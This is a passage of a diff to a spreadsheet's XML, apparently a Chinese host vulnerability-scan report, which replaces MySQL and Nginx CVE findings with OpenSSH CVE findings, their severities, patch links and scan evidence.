-          <t>192.168.54.213</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N37" t="inlineStr">
@@ -5524,11 +4654,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P37" t="inlineStr">
-        <is>
-          <t>test1111</t>
-        </is>
-      </c>
+      <c r="P37" t="inlineStr"/>
       <c r="Q37" t="inlineStr"/>
       <c r="R37" t="inlineStr">
         <is>
@@ -5542,7 +4668,7 @@
       </c>
       <c r="T37" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U37" t="inlineStr"/>
@@ -5553,29 +4679,7 @@
       </c>
       <c r="W37" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X37" t="inlineStr">
@@ -5592,7 +4696,7 @@
     <row r="38">
       <c r="A38" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server 安全漏洞(CVE-2020-14836)</t>
+          <t>Openssh 安全限制绕过漏洞(CVE-2016-10012)</t>
         </is>
       </c>
       <c r="B38" t="inlineStr">
@@ -5602,18 +4706,22 @@
       </c>
       <c r="C38" t="inlineStr">
         <is>
-          <t>中危</t>
-        </is>
-      </c>
-      <c r="D38" t="inlineStr"/>
+          <t>高危</t>
+        </is>
+      </c>
+      <c r="D38" t="inlineStr">
+        <is>
+          <t>代码执行</t>
+        </is>
+      </c>
       <c r="E38" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2020.html</t>
+          <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://github.com/openbsd/src/commit/3095060f479b86288e31c79ecbc5131a66bcd2f9</t>
         </is>
       </c>
       <c r="F38" t="inlineStr">
         <is>
-          <t>Oracle MySQL Server是美国甲骨文（Oracle）公司的一款关系型数据库。 Oracle MySQL Server Server: Optimizer 8.0.21版本及之前版本存在安全漏洞，该漏洞允许低特权攻击者通过多种协议进行网络访问，从而危害MySQL Server。成功攻击此漏洞可能导致未经授权的能力导致MySQL服务器挂起或频繁重复发生崩溃（完整的DOS）。</t>
+          <t>OpenSSH 7.4之前的版本中的sshd的共享内存管理器存在安全漏洞。本地攻击者可通过访问沙箱privilege-separation进程利用该漏洞获取权限。</t>
         </is>
       </c>
       <c r="G38" t="inlineStr">
@@ -5623,37 +4731,37 @@
       </c>
       <c r="H38" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I38" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J38" t="inlineStr">
         <is>
-          <t>CVE-2020-14836</t>
+          <t>CVE-2016-10012</t>
         </is>
       </c>
       <c r="K38" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L38" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M38" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N38" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O38" t="inlineStr">
@@ -5661,11 +4769,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P38" t="inlineStr">
-        <is>
-          <t>test1111</t>
-        </is>
-      </c>
+      <c r="P38" t="inlineStr"/>
       <c r="Q38" t="inlineStr"/>
       <c r="R38" t="inlineStr">
         <is>
@@ -5674,12 +4778,12 @@
       </c>
       <c r="S38" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T38" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U38" t="inlineStr"/>
@@ -5690,29 +4794,7 @@
       </c>
       <c r="W38" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X38" t="inlineStr">
@@ -5729,7 +4811,7 @@
     <row r="39">
       <c r="A39" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH 操作系统命令注入漏洞(CVE-2020-15778)</t>
         </is>
       </c>
       <c r="B39" t="inlineStr">
@@ -5742,15 +4824,19 @@
           <t>高危</t>
         </is>
       </c>
-      <c r="D39" t="inlineStr"/>
+      <c r="D39" t="inlineStr">
+        <is>
+          <t>命令执行</t>
+        </is>
+      </c>
       <c r="E39" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F39" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中，网络系统或产品未正确过滤其中的特殊字符、命令等。攻击者可利用该漏洞执行非法操作系统命令。</t>
         </is>
       </c>
       <c r="G39" t="inlineStr">
@@ -5760,37 +4846,37 @@
       </c>
       <c r="H39" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I39" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J39" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2020-15778</t>
         </is>
       </c>
       <c r="K39" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L39" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M39" t="inlineStr">
         <is>
-          <t>192.168.51.66</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N39" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O39" t="inlineStr">
@@ -5798,11 +4884,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P39" t="inlineStr">
-        <is>
-          <t>子组名</t>
-        </is>
-      </c>
+      <c r="P39" t="inlineStr"/>
       <c r="Q39" t="inlineStr"/>
       <c r="R39" t="inlineStr">
         <is>
@@ -5811,12 +4893,12 @@
       </c>
       <c r="S39" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T39" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U39" t="inlineStr"/>
@@ -5827,29 +4909,7 @@
       </c>
       <c r="W39" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X39" t="inlineStr">
@@ -5866,7 +4926,7 @@
     <row r="40">
       <c r="A40" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH 输入验证错误漏洞(CVE-2019-6111)</t>
         </is>
       </c>
       <c r="B40" t="inlineStr">
@@ -5876,18 +4936,22 @@
       </c>
       <c r="C40" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D40" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D40" t="inlineStr">
+        <is>
+          <t>输入验证错误</t>
+        </is>
+      </c>
       <c r="E40" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F40" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH中的scp client实用程序存在安全漏洞，该漏洞源于程序错误的验证了对象名称。攻击者可利用该漏洞覆盖文件。</t>
         </is>
       </c>
       <c r="G40" t="inlineStr">
@@ -5897,37 +4961,37 @@
       </c>
       <c r="H40" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I40" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J40" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2019-6111</t>
         </is>
       </c>
       <c r="K40" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L40" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M40" t="inlineStr">
         <is>
-          <t>192.168.54.68</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N40" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O40" t="inlineStr">
@@ -5935,11 +4999,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P40" t="inlineStr">
-        <is>
-          <t>父组名</t>
-        </is>
-      </c>
+      <c r="P40" t="inlineStr"/>
       <c r="Q40" t="inlineStr"/>
       <c r="R40" t="inlineStr">
         <is>
@@ -5948,12 +5008,12 @@
       </c>
       <c r="S40" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T40" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U40" t="inlineStr"/>
@@ -5964,29 +5024,7 @@
       </c>
       <c r="W40" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without JavaScript enabled. Please enable it to continue.&lt;/strong&gt;&lt;/noscript&gt;&lt;div id=app&gt;&lt;/div&gt;&lt;script src=js/chunk-vendors.67182cb7.js&gt;&lt;/script&gt;&lt;script src=js/chunk-common.161b0ce4.js&gt;&lt;/script&gt;&lt;script src=js/login.45ea665d.js&gt;&lt;/script&gt;&lt;/body&gt;&lt;/html&gt;&lt;style type="text/css" &gt;sgJ9tAEQGLHDyshOyknVgXoVxmVSwCTCWwiymVYNsaOtEbwVmipIrBrtRxhhBiCKj8+o9/JLrNbg2vrw1l6aMEBgcbD8Zjv8cax3uh4wmLWRpC6+0/Asnx5AnSKx65aYKzPuS522oFN37H4liDtmbGxYx/473DSOCquKP/tz3BfiGqS7/0yMFGa49Ya7O8WffzmZNbtKupH1jY9lOMtdG6jl/sST4hayB55PbxJuRUTpZg8jj/rm0CEpyrL+scINsc40ths7sGrXVKlMPQVoi8N3fx4/ohsRPsDtAmN/f29uErhhm5sPp7NPLju0J/s0a6uh0g52koiI0SSsiYVxjQ0l52urVAM6neoe/64vhcmn7wfi+f6D+67MsEm8nTUQu9KDrZA0ZeP64g1Aprr+jdatJsu9oT72xGHPSKBk3AMmjPISwiB9d4jDgYJW+Th4FjKP1+DFdwOK2otFY40LMnCj2No3145KhAUW0csX1//hMDHTGlSSWmYHbgl9Ba7/ctgUVUYovQLYXeCKmLzTwt50WoST8388lIRXsfedk/ZXNsX4vfnh40CEonv7OtiYPFtrplqSmyXgCZWIkgF1ttie3ls6q0TcDV/akQFQjvZF+asY68kKIefb4yRQ0lmdRTypJSL4sNTaB8n/7414Qk9Uv8U12DgPTLaJd9EYoh8=&lt;/style&gt;
-</t>
+          <t>组件及版本: OpenSSH:6.6.1</t>
         </is>
       </c>
       <c r="X40" t="inlineStr">
@@ -6003,7 +5041,7 @@
     <row r="41">
       <c r="A41" t="inlineStr">
         <is>
-          <t>Nginx 输入验证错误漏洞(CVE-2021-23017)</t>
+          <t>OpenSSH 访问控制错误漏洞(CVE-2019-6109)</t>
         </is>
       </c>
       <c r="B41" t="inlineStr">
@@ -6013,18 +5051,22 @@
       </c>
       <c r="C41" t="inlineStr">
         <is>
-          <t>高危</t>
-        </is>
-      </c>
-      <c r="D41" t="inlineStr"/>
+          <t>中危</t>
+        </is>
+      </c>
+      <c r="D41" t="inlineStr">
+        <is>
+          <t>访问控制错误</t>
+        </is>
+      </c>
       <c r="E41" t="inlineStr">
         <is>
-          <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://www.nginx.com/blog/updating-nginx-dns-resolver-vulnerability-cve-2021-23017/</t>
+          <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://www.openssh.com/</t>
         </is>
       </c>
       <c r="F41" t="inlineStr">
         <is>
-          <t>Nginx DNS Resolver Off-by-One 存在堆写入漏洞，该漏洞是由于Nginx在将未压缩的域名放入缓冲区时，并没有将到前面计算出的未压缩的DNS域名大小作为参数，攻击者可利用该漏洞在未授权的情况下，构造恶意数据执行如远程代码执行攻击，最终获取服务器最高权限。</t>
+          <t>OpenSSH（OpenBSD Secure Shell）是OpenBSD计划组所维护的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现，支持对所有的传输进行加密，可有效阻止窃听、连接劫持以及其他网络级的攻击。OpenSSH中存在安全漏洞，该漏洞源于程序没有对字符进行编码。攻击者可利用该漏洞伪造被显示的文件名。</t>
         </is>
       </c>
       <c r="G41" t="inlineStr">
@@ -6034,37 +5076,37 @@
       </c>
       <c r="H41" t="inlineStr">
         <is>
-          <t>云镜</t>
+          <t>云镜-服务版</t>
         </is>
       </c>
       <c r="I41" t="inlineStr">
         <is>
-          <t>原理扫描</t>
+          <t>版本比对</t>
         </is>
       </c>
       <c r="J41" t="inlineStr">
         <is>
-          <t>CVE-2021-23017</t>
+          <t>CVE-2019-6109</t>
         </is>
       </c>
       <c r="K41" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="L41" t="inlineStr">
         <is>
-          <t>2026-07-13 21:24</t>
+          <t>2026-07-24 16:33</t>
         </is>
       </c>
       <c r="M41" t="inlineStr">
         <is>
-          <t>192.168.54.174</t>
+          <t>10.128.160.50</t>
         </is>
       </c>
       <c r="N41" t="inlineStr">
         <is>
-          <t>服务器</t>
+          <t>其他</t>
         </is>
       </c>
       <c r="O41" t="inlineStr">
@@ -6072,11 +5114,7 @@
           <t>管理IP范围</t>
         </is>
       </c>
-      <c r="P41" t="inlineStr">
-        <is>
-          <t>test1111</t>
-        </is>
-      </c>
+      <c r="P41" t="inlineStr"/>
       <c r="Q41" t="inlineStr"/>
       <c r="R41" t="inlineStr">
         <is>
@@ -6085,12 +5123,12 @@
       </c>
       <c r="S41" t="inlineStr">
         <is>
-          <t>退库资产</t>
+          <t>台账资产</t>
         </is>
       </c>
       <c r="T41" t="inlineStr">
         <is>
-          <t>123</t>
+          <t>22</t>
         </is>
       </c>
       <c r="U41" t="inlineStr"/>
@@ -6101,29 +5139,7 @@
       </c>
       <c r="W41" t="inlineStr">
         <is>
-          <t xml:space="preserve">页面url: -
-请求体: GET /login.html HTTP/1.1
-Host: 129.195.085.043:443
-User-Agent: python-requests/2.23.0
-Accept-Encoding: gzip, deflate
-Accept: */*
-Connection: keep-alive
-Range: bytes=0-99999\r\n\r\n
-响应体: HTTP/1.1 200 OK
-Server: 
-Date: Tue, 10 May 2022 11:52:26 GMT
-Content-Type: text/html
-Content-Length: 1796
-Last-Modified: Mon, 09 May 2022 18:02:01 GMT
-Connection: keep-alive
-ETag: "62795719-704"
-X-Frame-Options: SAMEORIGIN
-X-XSS-Protection: 1; mode=block
-X-Content-Type-Options: nosniff
-Strict-Transport-Security: max-age=63072000; includeSubdomains; preload
-Content-Security-Policy: frame-ancestors: self
-Accept-Ranges: bytes\r\n\r\n&lt;!DOCTYPE html&gt;&lt;html lang=en&gt;&lt;head&gt;&lt;meta charset=utf-8&gt;&lt;meta http-equiv=X-UA-Compatible content="IE=edge"&gt;&lt;meta name=viewport content="width=device-width,initial-scale=1"&gt;&lt;link rel=icon href=favicon.ico&gt;&lt;title&gt;请登录&lt;/title&gt;&lt;link href=css/chunk-common.57048b51.css rel=preload as=style&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=preload as=style&gt;&lt;link href=css/login.964985a3.css rel=preload as=style&gt;&lt;link href=js/chunk-common.161b0ce4.js rel=preload as=script&gt;&lt;link href=js/chunk-vendors.67182cb7.js rel=preload as=script&gt;&lt;link href=js/login.45ea665d.js rel=preload as=script&gt;&lt;link href=css/chunk-vendors.9026249e.css rel=stylesheet&gt;&lt;link href=css/chunk-common.57048b51.css rel=stylesheet&gt;&lt;link href=css/login.964985a3.css rel=stylesheet&gt;&lt;/head&gt;&lt;body&gt;&lt;noscript&gt;&lt;strong&gt;We're sorry but cwpp-platform doesn't work properly without 